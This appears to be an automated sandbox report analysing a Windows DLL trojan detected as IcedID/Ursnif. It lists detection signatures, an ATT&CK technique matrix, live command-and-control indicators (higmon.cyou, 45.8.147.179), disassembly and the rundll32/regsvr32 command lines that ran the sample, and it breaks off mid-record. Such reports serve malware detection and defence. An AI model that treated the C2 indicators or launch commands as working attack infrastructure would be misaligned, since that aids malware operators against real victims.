          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4540, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\loaddll64.exe TID: 5140Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\System32\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
          Source: C:\Windows\System32\loaddll64.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-4758
          Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-5421
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\loaddll64.exeAPI coverage: 7.5 %
          Source: C:\Windows\System32\rundll32.exeAPI coverage: 7.5 %
          Source: C:\Windows\System32\rundll32.exeAPI coverage: 7.5 %
          Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
          Source: regsvr32.exe, 00000003.00000002.701416611.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701484036.0000000000B17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 45.8.147.179 443Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeDomain query: higmon.cyou
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1Jump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800045E8 GetSystemTimeAsFileTime,LeaveCriticalSection,0_2_00000001800045E8

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 5252, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4848, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4540, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 5252, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4848, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4540, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter
          1
          DLL Side-Loading
          111
          Process Injection
          11
          Virtualization/Sandbox Evasion
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium12
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Native API
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          111
          Process Injection
          LSASS Memory1
          Security Software Discovery
          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Non-Application Layer Protocol
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Obfuscated Files or Information
          Security Account Manager11
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Regsvr32
          NTDS1
          Remote System Discovery
          Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Rundll32
          LSA Secrets14
          System Information Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading
          Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 753126 Sample: c2b80b8cbd660c3208162ed596e... Startdate: 24/11/2022 Architecture: WINDOWS Score: 88 32 Snort IDS alert for network traffic 2->32 34 Multi AV Scanner detection for domain / URL 2->34 36 Antivirus detection for URL or domain 2->36 38 2 other signatures 2->38 8 loaddll64.exe 1 2->8         started        process3 process4 10 regsvr32.exe 8->10         started        14 cmd.exe 1 8->14         started        16 rundll32.exe 8->16         started        18 3 other processes 8->18 dnsIp5 30 higmon.cyou 45.8.147.179, 443, 49697, 49711 VMAGE-ASRU Russian Federation 10->30 40 System process connects to network (likely due to code injection or exploit) 10->40 20 cmd.exe 1 10->20         started        22 cmd.exe 2 10->22         started        24 rundll32.exe 14->24         started        signatures6 process7 process8 26 conhost.exe 20->26         started        28 conhost.exe 22->28         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll34%VirustotalBrowse
          c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll22%ReversingLabsWin64.Trojan.IcedID
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          higmon.cyou20%VirustotalBrowse
          SourceDetectionScannerLabelLink
          https://prises.cyou19%VirustotalBrowse
          https://higmon.cyou/index.html10%VirustotalBrowse
          https://http://Mozilla/5.00%Avira URL Cloudsafe
          https://higmon.cyouhttps://prises.cyou0%Avira URL Cloudsafe
          https://higmon.cyou/index.htmlce100%Avira URL Cloudmalware
          https://higmon.cyou/index.html100%Avira URL Cloudmalware
          https://higmon.cyou/100%Avira URL Cloudmalware
          https://prises.cyou100%Avira URL Cloudmalware
          https://higmon.cyou100%Avira URL Cloudmalware
          NameIPActiveMaliciousAntivirus DetectionReputation
          higmon.cyou
          45.8.147.179
          truetrueunknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://higmon.cyouhttps://prises.cyouregsvr32.exe, 00000003.00000002.701604821.000000000266E000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://my.tealiumiq.com/urest/legacy/tagcompanion/getProfile?utid=regsvr32.exe, regsvr32.exe, 00000003.00000002.701786113.00007FFA0AE63000.00000008.00000001.01000000.00000003.sdmp, c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllfalse
            high
            https://higmon.cyou/index.htmlregsvr32.exe, 00000003.00000002.701416611.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701474761.0000000000B06000.00000004.00000020.00020000.00000000.sdmptrue
            • 10%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            https://http://Mozilla/5.0loaddll64.exe, 00000000.00000002.587439990.0000023124122000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701620342.00000000027E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.311135038.000002233FD82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.311230320.0000020DA3AA2000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            low
            https://higmon.cyouloaddll64.exe, 00000000.00000002.587434823.0000023124120000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701616295.00000000027E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701604821.000000000266E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.311124854.000002233FD80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.311225044.0000020DA3AA0000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            https://prises.cyouloaddll64.exe, 00000000.00000002.587434823.0000023124120000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701616295.00000000027E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701604821.000000000266E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.311124854.000002233FD80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.311225044.0000020DA3AA0000.00000004.00000020.00020000.00000000.sdmpfalse
            • 19%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            https://higmon.cyou/regsvr32.exe, 00000003.00000002.701457779.0000000000AE7000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            https://higmon.cyou/index.htmlceregsvr32.exe, 00000003.00000002.701416611.0000000000A98000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            45.8.147.179
            higmon.cyouRussian Federation
            44676VMAGE-ASRUtrue
            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:753126
            Start date and time:2022-11-24 10:58:17 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 7m 40s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Run name:Run with higher sleep bypass
            Number of analysed new started processes analysed:16
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal88.troj.evad.winDLL@20/1@1/1
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 28.5% (good quality ratio 19.4%)
            • Quality average: 39.4%
            • Quality standard deviation: 34.4%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 57
            • Number of non-executed functions: 184
            Cookbook Comments:
            • Found application associated with file extension: .dll
            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe
            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, login.live.com, ctldl.windowsupdate.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            No simulations
            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            45.8.147.179c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllGet hashmaliciousBrowse
              https://michaelpageuk5ukln.com/michael-pageGet hashmaliciousBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                higmon.cyouhttps://michaelpageuk5ukln.com/michael-pageGet hashmaliciousBrowse
                • 45.8.147.179
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                VMAGE-ASRUc2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllGet hashmaliciousBrowse
                • 45.8.147.179
                73WTGbC71V.exeGet hashmaliciousBrowse
                • 45.8.144.232
                GpPP25HfBe.exeGet hashmaliciousBrowse
                • 45.8.145.101
                vhVK5w3w9z.exeGet hashmaliciousBrowse
                • 45.8.147.217
                6qC3krpy7W.exeGet hashmaliciousBrowse
                • 45.89.54.50
                tNID7H5KEX.exeGet hashmaliciousBrowse
                • 45.89.54.50
                SecuriteInfo.com.Trojan.NSISX.Spy.Gen.24.12780.9165.exeGet hashmaliciousBrowse
                • 5.182.38.12
                pPKkXryP9Z.exeGet hashmaliciousBrowse
                • 45.8.147.200
                Setup.exeGet hashmaliciousBrowse
                • 45.8.147.121
                ncvfa8g3DH.exeGet hashmaliciousBrowse
                • 45.8.144.183
                wOac7k4IQV.exeGet hashmaliciousBrowse
                • 5.182.37.34
                SlackSetup.imgGet hashmaliciousBrowse
                • 45.8.144.15
                Setup.exeGet hashmaliciousBrowse
                • 45.8.147.121
                THIN_MONKEY.exeGet hashmaliciousBrowse
                • 45.8.147.121
                Setup.exeGet hashmaliciousBrowse
                • 45.8.147.31
                b0AYw478Oz.exeGet hashmaliciousBrowse
                • 5.182.36.101
                L5AoXj4g4X.exeGet hashmaliciousBrowse
                • 5.182.36.101
                tkROtVzFhk.exeGet hashmaliciousBrowse
                • 45.159.248.118
                fHDSifQWY9.exeGet hashmaliciousBrowse
                • 45.89.55.178
                W4HI0bszxh.exeGet hashmaliciousBrowse
                • 45.8.146.34
                No context
                No context
                Process:C:\Windows\System32\cmd.exe
                File Type:ASCII text, with CRLF line terminators
                Category:modified
                Size (bytes):1555
                Entropy (8bit):4.637605355040898
                Encrypted:false
                SSDEEP:48:kSQIgwMlVMHVMw5HgTVvVRyoPVguO+yoVroVIMVTHdVOqpDVJAV2VRD:rQIgwUGHGQAhPdPLO+2OMHnpzAcPD
                MD5:98F0D700E30A868BC35BFC79D2EE3437
                SHA1:EB67F670F628153AE0424104B938F391298CAA94
                SHA-256:8752BBED9EA031A599EA0AD1D0747A363DA6763A5290943C74AE197CBC02EAED
                SHA-512:10AC577BB2657877328394861A19358C8401F586A9FA2D0B151104C67CADA7372FB46B555FE825D4DAF8408128E4BD3ABCC339B022595BBC8E3AB2E4CBD887DF
                Malicious:false
                Preview:Commands .. Volume in drive C has no label... Volume Serial Number is 9902-14F3.... Directory of C:\Users\user\Desktop....08/16/2022 02:23 PM <DIR> ...08/16/2022 02:23 PM <DIR> ....08/16/2022 02:23 PM 1,026 BPMLNOBVSB.jpg..08/16/2022 02:23 PM 1,026 BPMLNOBVSB.xlsx..11/24/2022 10:59 AM 538,624 c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll..08/16/2022 02:23 PM <DIR> CURQNKVOIX..07/23/2020 09:52 AM 2,660 Excel 2016.lnk..08/16/2022 02:23 PM 1,026 FENIVHOIKN.mp3..08/16/2022 02:23 PM 1,026 FENIVHOIKN.pdf..08/16/2022 02:23 PM <DIR> JSDNGYCOWY..08/16/2022 02:23 PM 1,026 JSDNGYCOWY.docx..06/27/2019 10:34 AM 1,417 Microsoft Edge.lnk..08/16/2022 02:23 PM <DIR> NEBFQQYWPS..08/16/2022 02:23 PM 1,026 NIKHQAIQAU.pdf..08/16/2022 02:23 PM 1,026 RAYHIWGKDI.png..08/16/2022 02:23 PM <DIR
                File type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Entropy (8bit):5.822863121964014
                TrID:
                • Win64 Dynamic Link Library (generic) (102004/3) 77.79%
                • Windows Screen Saver (13104/52) 9.99%
                • Win64 Executable (generic) (12005/4) 9.16%
                • Generic Win/DOS Executable (2004/3) 1.53%
                • DOS Executable Generic (2002/1) 1.53%
                File name:c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll
                File size:538624
                MD5:590d96a7be55240ad868ebec78ce38f2
                SHA1:2aaf8acb010dfe83b808d7cc77f6821aaf44f3d2
                SHA256:846a8058cda54207aebb885f99dab0eab57529eb8dd94a3d57bbde2e93c4aad4
                SHA512:9360564b79909f934db9120315d981d3b2bf5e1f853baa0145d7ff9b0ac375d452d11d86f90dfe5547fdbd8f4f04a8f4fd2f73c50eab2df7bddb8207194d126a
                SSDEEP:6144:al+x6f16rj6MrQeQap0+TMPRxWer+YeZczE72q1i6qs6Yfs:a4416SCpXMPjWce+Eqq1i6qdas
                TLSH:D8B46D60B11030FFF6ABC039B1C66BD96279B113E9524DBEF05A98D48B8878B1177F19
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.}.1...1...1.......6...1...>.......0.......0.......0.......0...Rich1...........................PE..d.....2c.........." .......
                Icon Hash:74f0e4ecccdce0e4
                Entrypoint:0x180001000
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x180000000
                Subsystem:windows cui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x6332D8E8 [Tue Sep 27 11:05:12 2022 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:16a8f4e2ed702e8523beef35ae5110a0
                Instruction
                jmp 00007FB48117491Ch
                mov eax, 00000001h
                add eax, 00000000h
                jmp 00007FB481174902h
                dec eax
                add esp, 18h
                ret
                dec eax
                mov dword ptr [esp+08h], ecx
                dec eax
                sub esp, 18h
                jmp 00007FB48117490Dh
                dec esp
                mov dword ptr [esp+18h], eax
                mov dword ptr [esp+10h], edx
                jmp 00007FB4811748ECh
                mov eax, dword ptr [esp+28h]
                mov dword ptr [esp], eax
                jmp 00007FB4811748D4h
                jmp 00007FB481174AA8h
                mov byte ptr [esp+67h], 0000000Ah
                add byte ptr [esp+67h], 00000066h
                jmp 00007FB48117491Ah
                mov byte ptr [esp+64h], 00000012h
                add byte ptr [esp+64h], 00000026h
                jmp 00007FB481174954h
                mov byte ptr [esp+66h], 0000000Dh
                add byte ptr [esp+66h], 00000062h
                jmp 00007FB4811748DEh
                mov byte ptr [esp+68h], 00000034h
                add byte ptr [esp+68h], 00000030h
                jmp 00007FB481174924h
                add dx, 000Ah
                xor ecx, ecx
                jmp 00007FB481174AF3h
                mov byte ptr [esp+6Bh], 0000001Eh
                add byte ptr [esp+6Bh], 00000055h
                jmp 00007FB481174902h
                mov byte ptr [esp+6Ch], 00000000h
                mov dx, 0011h
                jmp 00007FB4811748E0h
                mov byte ptr [esp+69h], 00000032h
                add byte ptr [esp+69h], 00000047h
                jmp 00007FB481174902h
                mov byte ptr [esp+6Ah], 00000004h
                add byte ptr [esp+6Ah], 00000070h
                jmp 00007FB4811748D3h
                mov byte ptr [esp+65h], 00000041h
                add byte ptr [esp+65h], 0000002Bh
                jmp 00007FB4811748A4h
                call 00007FB481174AF3h
                xor eax, eax
                jmp 00007FB481174A00h
                call dword ptr [00000F5Bh]
                test eax, eax
                jne 00007FB4811748F1h
                jmp 00007FB481174A91h
                call dword ptr [00000000h]
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x20900x144.rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT0x21d40x50.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x850000x1e0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x90.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000xfe00x1000False0.59130859375DOS executable (COM)5.742356131814896IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x20000x41a0x600False0.380859375COM executable for DOS3.47027698168912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .sedt0x30000x81ad60x81c00False0.3247832369942196data5.775703252117877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x850000x1e00x200False0.52734375data4.719348272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountry
                RT_MANIFEST0x850600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                DLLImport
                KERNEL32.dllVirtualAlloc, GetConsoleMode, PeekConsoleInputA, ReadConsoleA, FlushConsoleInputBuffer, GetConsoleScreenBufferInfo, SetConsoleCursorPosition, SetConsoleTextAttribute, ReadConsoleOutputA, GetCurrentConsoleFont
                USER32.dllGetScrollBarInfo, DefMDIChildProcW
                USP10.dllScriptXtoCP, ScriptString_pSize, ScriptTextOut
                NameOrdinalAddress
                DllRegisterServer10x180001030
                FgnfMvSNFULXZx20x180001e60
                KVpawdrrKTUjeZuk30x180001e3c
                LaEiyoOgoiNTr40x180001f5c
                WOlqmpYHUmo50x180001e84
                XEuCWLzwGSc60x180001ea8
                ZdXkUtuwLqhmt70x180001f38
                aLcPpKozZItuf80x180001f14
                cNtNVfZnIZvqyMq90x180001ecc
                hbOIyYikdaBLyqU100x180001ef0
                zJhDuUvYOmGa110x180001e18
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.2.78.8.8.860326532039637 11/24/22-10:49:03.324067UDP2039637ET TROJAN Observed DNS Query to Ursnif Domain (higmon .cyou)6032653192.168.2.78.8.8.8
                TimestampSource PortDest PortSource IPDest IP
                Nov 24, 2022 10:59:21.393560886 CET49697443192.168.2.545.8.147.179
                Nov 24, 2022 10:59:21.393637896 CET4434969745.8.147.179192.168.2.5
                Nov 24, 2022 10:59:21.393753052 CET49697443192.168.2.545.8.147.179
                Nov 24, 2022 10:59:21.399569035 CET49697443192.168.2.545.8.147.179
                Nov 24, 2022 10:59:21.399631977 CET4434969745.8.147.179192.168.2.5
                Nov 24, 2022 11:01:30.715332985 CET4434969745.8.147.179192.168.2.5
                Nov 24, 2022 11:01:30.717338085 CET49711443192.168.2.545.8.147.179
                Nov 24, 2022 11:01:30.717417955 CET4434971145.8.147.179192.168.2.5
                Nov 24, 2022 11:01:30.717530012 CET49711443192.168.2.545.8.147.179
                Nov 24, 2022 11:01:30.718745947 CET49711443192.168.2.545.8.147.179
                Nov 24, 2022 11:01:30.718775034 CET4434971145.8.147.179192.168.2.5
                TimestampSource PortDest PortSource IPDest IP
                Nov 24, 2022 10:59:21.335097075 CET5689453192.168.2.58.8.8.8
                Nov 24, 2022 10:59:21.358067989 CET53568948.8.8.8192.168.2.5
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Nov 24, 2022 10:59:21.335097075 CET192.168.2.58.8.8.80x4b47Standard query (0)higmon.cyouA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Nov 24, 2022 10:59:21.358067989 CET8.8.8.8192.168.2.50x4b47No error (0)higmon.cyou45.8.147.179A (IP address)IN (0x0001)false

                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:10:59:17
                Start date:24/11/2022
                Path:C:\Windows\System32\loaddll64.exe
                Wow64 process (32bit):false
                Commandline:loaddll64.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll"
                Imagebase:0x7ff68d820000
                File size:139776 bytes
                MD5 hash:C676FC0263EDD17D4CE7D644B8F3FCD6
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:1
                Start time:10:59:17
                Start date:24/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7fcd70000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:2
                Start time:10:59:17
                Start date:24/11/2022
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
                Imagebase:0x7ff627730000
                File size:273920 bytes
                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:3
                Start time:10:59:17
                Start date:24/11/2022
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll
                Imagebase:0x7ff7c3220000
                File size:24064 bytes
                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:4
                Start time:10:59:18
                Start date:24/11/2022
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
                Imagebase:0x7ff7454a0000
                File size:69632 bytes
                MD5 hash:73C519F050C20580F8A62C849D49215A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:5
                Start time:10:59:18
                Start date:24/11/2022
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,DllRegisterServer
                Imagebase:0x7ff7454a0000
                File size:69632 bytes
                MD5 hash:73C519F050C20580F8A62C849D49215A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:6
                Start time:10:59:20
                Start date:24/11/2022
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c "echo Commands" >> C:\Users\user\AppData\Local\Temp\2F60.tmp
                Imagebase:0x7ff627730000
                File size:273920 bytes
                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Target ID:7
                Start time:10:59:21
                Start date:24/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7fcd70000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Target ID:8
                Start time:10:59:21
                Start date:24/11/2022
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,FgnfMvSNFULXZx
                Imagebase:0x7ff7454a0000
                File size:69632 bytes
                MD5 hash:73C519F050C20580F8A62C849D49215A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Target ID:9
                Start time:10:59:22
                Start date:24/11/2022
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c "dir" >> C:\Users\user\AppData\Local\Temp\2F60.tmp
                Imagebase:0x7ff627730000
                File size:273920 bytes
                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Target ID:10
